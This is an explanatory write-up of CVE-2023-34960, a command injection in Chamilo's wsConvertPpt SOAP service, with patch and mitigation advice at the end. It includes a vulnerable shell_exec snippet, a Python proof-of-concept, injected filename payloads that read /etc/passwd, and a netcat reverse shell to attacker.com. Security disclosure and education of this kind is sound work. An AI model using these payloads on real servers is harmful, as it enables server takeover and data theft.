CVE-2023-34960 - Critical Command Injection in Chamilo wsConvertPpt (v1.11.x – v1.11.18) Explained

Chamilo is a popular open-source e-learning platform, used worldwide by schools, universities, and companies. But in June 2023, security researchers uncovered a dangerous command injection vulnerability (CVE-2023-34960) in one of its core features: the wsConvertPpt component. This weakness can let attackers run commands on the server – with just a specially crafted PowerPoint file name, via a SOAP webservice call.

In this guide, I’ll break down how this vulnerability works, show part of the exploit process, and explain how you can protect your platform.

1. What is wsConvertPpt in Chamilo?

wsConvertPpt is a component in Chamilo that converts PowerPoint (.ppt) files into images for use in online courses. This is done through a SOAP (Simple Object Access Protocol) API call—typically something only admins or the system itself would use. However, due to bad input handling, attackers can abuse this interface.

2. The Vulnerability: Command Injection

Here’s the short version: Chamilo didn’t sanitize the file name sent to wsConvertPpt. If an attacker sends a *maliciously crafted* PowerPoint file name (containing shell commands), the server will run those commands—often with high privileges.

Original Discovery References

- Chamilo Security Advisory
- Packet Storm Security Advisory

In the official fix, the maintainers patched the command injection by filtering and validating user input.

3. Where in the Code? (Vulnerable Snippet)

The vulnerability lies around how Chamilo calls shell commands to process file names, without cleaning up special characters. Here’s a simplified code snippet (based on reported patches and public disclosures):

// WARNING: This is insecure and vulnerable!
$ppt_file = $_POST['ppt_file'];
$cmd = "unoconv -f pdf $ppt_file";
$output = shell_exec($cmd);

Normally, $ppt_file should be just a file name like lesson1.ppt. But if an attacker sends something like evil.ppt; id > /tmp/hacked.txt; #, the shell would execute *both* the conversion and the attacker’s injected command!

4. How Does Exploitation Work?

Here’s how an attacker might exploit CVE-2023-34960, step by step, using the SOAP API.

Prerequisites

- Access to Chamilo’s SOAP interface (often /main/webservices/soap/)
- No input filtering / patch not applied

Send a SOAP request to the wsConvertPpt service with a specially crafted filename parameter

- Example: dummy.ppt; id > /var/www/html/shell.txt; #

Chamilo server receives the request and runs the shell command with your injected payload.

3. The attacker’s command executes: In this case, it runs id (which prints the running user), and saves the output to a web-accessible file.
4. Attacker checks the file via their browser to read the server’s identity, proving command execution.

Example SOAP Exploit (Python)

Below is a simplified demo of what an exploit might look like. *Do not run this outside a safe test environment!*

import requests

soap_url = "http://chamilo.example.com/main/webservices/soap/server.php";
headers = {
    'Content-Type': 'text/xml; charset=utf-8',
    'SOAPAction': '"urn:#wsConvertPpt"'
}
malicious_name = "evil.ppt; id > /var/www/html/cve.txt; #"
soap_body = f"""<?xml version="1." encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">;
  <soap:Body>
    <wsConvertPpt xmlns="urn:ChamiloAPI">
      <name>{malicious_name}</name>
    </wsConvertPpt>
  </soap:Body>
</soap:Envelope>
"""

# Send the malicious request
response = requests.post(soap_url, data=soap_body, headers=headers)
print(f"SOAP status: {response.status_code}")

# The file 'cve.txt' may now contain server command results!
check = requests.get("http://chamilo.example.com/cve.txt";)
print("Command output:\n" + check.text)

Any shell command is possible in the injected filename. Examples

- Dump the password file: evil.ppt; cat /etc/passwd > /var/www/html/pwd.txt ; #
- Create a reverse shell: evil.ppt; nc attacker.com 4444 -e /bin/sh ; #

Install malware on the server.

- Extract sensitive user/course files.

7. Fixing the Vulnerability

Update Chamilo as soon as possible, preferably to v1.11.19 or later. You can find official fixes and recommendations here:

- Official Chamilo Security Issues Page
- Upgrade instructions: Chamilo Upgrade Docs

Disable SOAP API if not needed.

- Restrict access to /main/webservices/soap/server.php using firewall or htaccess.

8. Summary

CVE-2023-34960 is a textbook example of why input validation is critical—especially when file names or user input reaches the OS shell. In Chamilo, attackers could exploit this flaw for complete server compromise via a simple SOAP API call. Patching and preventative controls are essential.

Further Reading

- NIST CVE Entry
- Official Chamilo Github
- How to Prevent Command Injection

If you have questions on remediation or think you might be vulnerable, feel free to reach out to the Chamilo community or a trusted security advisor. Stay safe!

Timeline

Published on: 08/01/2023 02:15:00 UTC
Last modified on: 08/24/2023 17:15:00 UTC